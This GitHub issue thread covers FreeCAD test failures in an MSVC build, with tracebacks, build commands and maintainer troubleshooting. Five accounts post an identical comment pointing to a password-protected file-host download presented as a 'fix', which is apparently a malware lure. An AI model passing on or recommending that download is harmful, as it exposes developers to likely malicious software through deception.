FreeCAD/FreeCAD #16086: [MSVC] TestFemApp and TestCAMApp failed when running tests

NEIL-smtg, 2024-08-27:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

I work on MSVC compiler testing, and we regularly build popular open-source project including FreeCAD, with development builds of MSVC in order to find and fix regressions before they ship.

Recently, when we are building FreeCAD with MSVC, there are 2 tests failed when running `FreeCADcmd.exe --runtest 0`

**TestFemApp (unittest.loader._FailedTest.TestFemApp)** 
```
ImportError: Failed to import test module: TestFemApp
Traceback (most recent call last):
  File "c:\gitP\FreeCAD\FreeCAD\externalTools\LibPack-1.0.0-v3.0.0RC4-Release\bin\Lib\unittest\loader.py", line 137, in loadTestsFromName
    module = __import__(module_name)
             ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\Fem\TestFemApp.py", line 33, in <module>
    from femtest.app.test_mesh import TestMeshCommon as FemTest07
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\Fem\femtest\app\test_mesh.py", line 33, in <module>
    import Fem
ImportError: DLL load failed while importing Fem: The specified module could not be found.
```

Then, when I tried install Fem, and I get the following error:
```
Collecting fem
  Using cached fem-0.0.99.tar.gz (12 kB)
  Preparing metadata (setup.py) ... error
  error: subprocess-exited-with-error

  × python setup.py egg_info did not run successfully.
  │ exit code: 1
  ╰─> [6 lines of output]
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "C:\Users\v-neilchua\AppData\Local\Temp\2\pip-install-b6tgrc8t\fem_40f58ddca9be4eb78ed77d06a7dd6d96\setup.py", line 1, in <module>
          from numpy.distutils.core import Extension
      ModuleNotFoundError: No module named 'numpy.distutils'
      [end of output]
```
I found out that numpy package that provided in libpack is 1.26 which does not contain `numpy.disutils`.

**TestCAMApp (unittest.loader._FailedTest.TestFemApp)**
Refer to [TestCAMApp_test_failed_output.txt](https://github.com/user-attachments/files/16758108/TestCAMApp_test_failed_output.txt) for detailed info.

**Step to reproduce**

1. git clone https://github.com/FreeCAD/FreeCAD.git
2. cd FreeCAD
3. download and extract https://github.com/FreeCAD/FreeCAD-LibPack/releases/download/3.0.0RC4/LibPack-1.0.0-v3.0.0RC4-Release.7z
4. Open x64 Native Windows Command Prompt
5. set VSCMD_SKIP_SENDTELEMETRY=1 & "C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" -host_arch=amd64 -arch=amd64
6. mkdir build_amd64 & cd build_amd64
7. cmake -G "Visual Studio 17 2022" -A x64 -DCMAKE_SYSTEM_VERSION=10.0.22621.0 -DCMAKE_TOOLCHAIN_FILE=C:\gitP\Microsoft\vcpkg\scripts\buildsystems\vcpkg.cmake -DVCPKG_TARGET_TRIPLET=x64-windows -DFREECAD_LIBPACK_DIR=C:\gitP\FreeCAD\FreeCAD\externalTools\LibPack-1.0.0-v3.0.0RC4-Release -DBUILD_FEM_NETGEN=OFF -DFREECAD_RELEASE_PDB=OFF -DPython3_EXECUTABLE={LIBPACK_PATH}/LibPack-1.0.0-v3.0.0RC4-Release/bin/python.exe -DFREECAD_RELEASE_SEH=OFF  .. 2>&1
8. msbuild /m /p:Platform=x64 /p:Configuration=Release FreeCAD.sln /t:Rebuild  2>&1
9. cd bin\
10. set Path={LIBPACK_PATH}\LibPack-1.0.0-v3.0.0RC4-Release\lib;%PATH%
11. xcopy {LIBPACK_PATH}\LibPack-1.0.0-v3.0.0RC4-Release\bin\ . /k/r/e/i/s/c/h/f/y
12. FreeCADCmd.exe --run-test 0 -P {LIBPACK_PATH}\LibPack-1.0.0-v3.0.0RC4-Release\bin\python.exe -M {LIBPACK_PATH}\LibPack-1.0.0-v3.0.0RC4-Release\bin\Lib\site-packages

_Note: {LIBPACK_PATH} is the path where you extract the LibPack-1.0.0-v3.0.0RC4-Release_

### Full version info

```shell
None
```

### Subproject(s) affected?

None

### Anything else?

Full build log: [build.log](https://github.com/user-attachments/files/16758303/build.log)
Full test.log: [test_log.txt](https://github.com/user-attachments/files/16758320/test_log.txt)

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

FoioMikael, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

praveenking945, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

luzpaz, 2024-08-27:
Thanks very much for your detailed bug report!  
CC @chennes @kkremitzki

luzpaz, 2024-08-30:
@FEA-eng any idea why the FEM test is failing ?

FEA-eng, 2024-09-02:
> @FEA-eng any idea why the FEM test is failing ?

It seems that it's not just the test failing but rather the whole workbench not being installed due to missing numpy.distutils. This part is IMO important:

> I found out that numpy package that provided in libpack is 1.26 which does not contain numpy.disutils.

So can it be because of the Libpack version?

luzpaz, 2024-09-02:
@chennes  ☝️

chennes, 2024-09-02:
numpy.distutils is deprecated, and was removed for Python >= 3.12 -- so we really need to figure out what bit of code needs it, and remove/rewrite that.

chennes, 2024-09-02:
Pinging @marioalexis84 and @FEA-eng for help locating and addressing this.

chennes, 2024-09-02:
The fundamental problem is not a missing numpy.distutils -- that package is deprecated and was removed for Python >= 3.12. If you take a look at the process in the OP, that only happens when @NEIL-smtg tried to run `pip install fem` to try to work around the missing Fem reported above. That isn't going to work, of course, since Fem is part of FreeCAD, not an external Python package. The reported error after that is just a failure to install whatever pip is trying to install when you ask it for "Fem". I'll try to follow the detailed build instructions here and see if I can reproduce the issue locally. My MSVC/CLion build runs the test suite without issue.

chennes, 2024-09-02:
@sliptonic can you look at those CAM test logs and see if anything jumps out at you? The failures are
```

======================================================================
FAIL: test01 (Tests.TestPathAdaptive.TestPathAdaptive.test01)
test01() Verify path generated on Face3.
----------------------------------------------------------------------
Traceback (most recent call last):
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\CAM\Tests\TestPathAdaptive.py", line 140, in test01
    self.assertTrue(
AssertionError: False is not true : Command count not greater than 100.

======================================================================
FAIL: test02 (Tests.TestPathAdaptive.TestPathAdaptive.test02)
test02() Verify path generated on adjacent, combined Face3 and Face10.  The Z heights are different.
----------------------------------------------------------------------
Traceback (most recent call last):
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\CAM\Tests\TestPathAdaptive.py", line 169, in test02
    self.assertTrue(
AssertionError: False is not true : Command count not greater than 100.

======================================================================
FAIL: test03 (Tests.TestPathAdaptive.TestPathAdaptive.test03)
test03() Verify path generated on adjacent, combined Face3 and Face10.  The Z heights are different.
----------------------------------------------------------------------
Traceback (most recent call last):
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\CAM\Tests\TestPathAdaptive.py", line 198, in test03
    self.assertTrue(
AssertionError: False is not true : Command count not greater than 100.

======================================================================
FAIL: test04 (Tests.TestPathAdaptive.TestPathAdaptive.test04)
test04() Verify path generated non-closed edges with differing Z-heights that are closed with Z=1 projection: "Edge9", "Edge2", "Edge8", "Edge15", "Edge30", "Edge31", "Edge29", "Edge19".
----------------------------------------------------------------------
Traceback (most recent call last):
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\CAM\Tests\TestPathAdaptive.py", line 241, in test04
    self.assertTrue(
AssertionError: False is not true : Command count not greater than 100.

======================================================================
FAIL: test05 (Tests.TestPathAdaptive.TestPathAdaptive.test05)
test05() Verify path generated closed wire with differing Z-heights: "Edge13", "Edge7", "Edge9", "Edge2", "Edge8", "Edge15", "Edge30", "Edge31", "Edge29", "Edge19".
----------------------------------------------------------------------
Traceback (most recent call last):
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\CAM\Tests\TestPathAdaptive.py", line 286, in test05
    self.assertTrue(
AssertionError: False is not true : Command count not greater than 100.

======================================================================
FAIL: test06 (Tests.TestPathAdaptive.TestPathAdaptive.test06)
test06() Verify path generated with outer and inner edge loops at same Z height: "Edge15", "Edge30", "Edge31", "Edge29", "Edge19", "Edge18", "Edge35", "Edge32", "Edge34", "Edge33".
----------------------------------------------------------------------
Traceback (most recent call last):
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\CAM\Tests\TestPathAdaptive.py", line 332, in test06
    self.assertTrue(
AssertionError: False is not true : Command count not greater than 100.

======================================================================
FAIL: test07 (Tests.TestPathAdaptive.TestPathAdaptive.test07)
test07() Verify path generated on donut-shaped Face10.
----------------------------------------------------------------------
Traceback (most recent call last):
  File "C:\gitP\FreeCAD\FreeCAD\build_amd64\Mod\CAM\Tests\TestPathAdaptive.py", line 377, in test07
    self.assertTrue(
AssertionError: False is not true : Command count not greater than 100.

----------------------------------------------------------------------
```

chennes, 2024-09-02:
I see that @NEIL-smtg is building with BUILD_FEM_NETGEN=Off -- @FEA-eng are the FEM tests written such that they work with that disabled?

FEA-eng, 2024-09-02:
> I see that @NEIL-smtg is building with BUILD_FEM_NETGEN=Off -- @FEA-eng are the FEM tests written such that they work with that disabled?

It seems that two of them at least call Netgen mesher along with all other FEM tools:
https://github.com/FreeCAD/FreeCAD/blob/ed97f3c4591303ee3b54906768f8f4eba5211265/src/Mod/Fem/femtest/app/test_object.py#L746
https://github.com/FreeCAD/FreeCAD/blob/ed97f3c4591303ee3b54906768f8f4eba5211265/src/Mod/Fem/femtest/app/test_femimport.py#L129

But the one mentioned in the OP (test_mesh) doesn’t need it since it creates the mesh manually (without any mesher).

IMO tests shouldn’t require Netgen because it’s usually not used when building on Ubuntu (disabled by default and not easy to include).

chennes, 2024-09-02:
For the record, if I follow the exact steps reported above, I can reproduce the same test failure locally. Interestingly, if I *do not* provide the -M command line argument the errors change, with the CAM failures all reducing to a failure to load the `area` module. This is probably really a conflict between a local copy of `area.py` in CAM, and a pip-installed package of the same name.

For FEM, test_mesh.py is the only test module that attempts to `import Fem` -- and indeed, running that command on a non-GUI CLI version of the FreeCAD prompt built with the options specified above does fail. I have not narrowed down exactly why, but maybe @FEA-eng or @marioalexis84 know?

chennes, 2024-09-03:
It's got something to do with the way the files are being copied. @NEIL-smtg I took some steps to minimize your build process, and when I replaced your use of xcopy and setting if PATH with the internal FreeCAD build system commands to copy the appropriate files, the failure goes away:
```
mkdir build_amd64
cd build_amd64
set cmake_toolchain=-G "Visual Studio 17 2022" -A x64 -DCMAKE_SYSTEM_VERSION=10.0.22621.0 -DCMAKE_TOOLCHAIN_FILE=G:\FreeCAD\vcpkg\scripts\buildsystems\vcpkg.cmake -DVCPKG_TARGET_TRIPLET=x64-windows
set fc_args=-DFREECAD_LIBPACK_DIR=G:\FreeCAD\FreeCAD-LibPack-chennes\working\LibPack-1.0.0-v3.0.0RC4-Release 
set copy_args=-DFREECAD_COPY_LIBPACK_BIN_TO_BUILD=ON -DFREECAD_COPY_DEPEND_DIRS_TO_BUILD=ON -DFREECAD_COPY_PLUGINS_BIN_TO_BUILD=ON
cmake %cmake_toolchain%  %fc_args% %copy_args% ../FreeCAD
msbuild /m /p:Platform=x64 /p:Configuration=Release FreeCAD.sln /t:Rebuild
cd bin
FreeCADCmd.exe --run-test 0
```
I'm not sure why you are using the vcpkg commands -- I left them in, but my build works without them as well. The most critical thing here are those copy options, which do basically what your xcopy command does, but I guess including or excluding something that was causing the tests to fail.

marioalexis84, 2024-09-03:
@chennes, I can't reproduce the error.

chennes, 2024-09-03:
Thanks for checking @marioalexis84, I don't think it's really FreeCAD, I think it's something to do with the `xcopy` command the OP is using.

@NEIL-smtg I'm going to close this issue since it doesn't appear to be directly related to FreeCAD. If you need help getting your build setup working, reach out to be a chennes@freecad.org and I'd be happy to assist.

closed 2024-09-03 by luzpaz

NEIL-smtg, 2024-09-18:
Hi @chennes I followed your instructions, but I'm still encountering a different error, as the following screenshot:

[image]

I'm using this cmake command:
```sh
cmake -G "Visual Studio 17 2022" -A x64 -DCMAKE_SYSTEM_VERSION=10.0.22621.0 -DCMAKE_TOOLCHAIN_FILE=C:\gitP\Microsoft\vcpkg\scripts\buildsystems\vcpkg.cmake -DVCPKG_TARGET_TRIPLET=x64-windows -DFREECAD_LIBPACK_DIR=C:\gitP\FreeCAD\FreeCAD\externalTools\LibPack-1.0.0-v3.0.0RC2-Release -DFREECAD_COPY_DEPEND_DIRS_TO_BUILD=ON -DFREECAD_COPY_LIBPACK_BIN_TO_BUILD=ON-DFREECAD_COPY_PLUGINS_BIN_TO_BUILD=ON .. 2>&1
```

Build log:
[build.txt](https://github.com/user-attachments/files/17037100/build.txt)

Test log: 
[Test.log.3.txt](https://github.com/user-attachments/files/17037102/Test.log.3.txt)

chennes, 2024-09-18:
@NEIL-smtg that's progress, at any rate. I'm looking into why the LibPack does not appear to contain ply: its build script specifies that it should be there, but looking at my local copy, it is not. I'll have to dig around a bit, and right now it's backburnered because of the upcoming release of 1.0 (which does not use LibPack 3). Stay tuned...

On another note, I see you are using vcpkg to pull in fmt and libyaml -- those are in the LibPack, and you should not need to install them independently.

NEIL-smtg, 2024-09-18:
@chennes Got it. Thanks for the update!

NEIL-smtg, 2024-09-18:
Hi @chennes, the test passed after updating to the latest commit and libpack. My mistake on that, and thanks so much for all your help!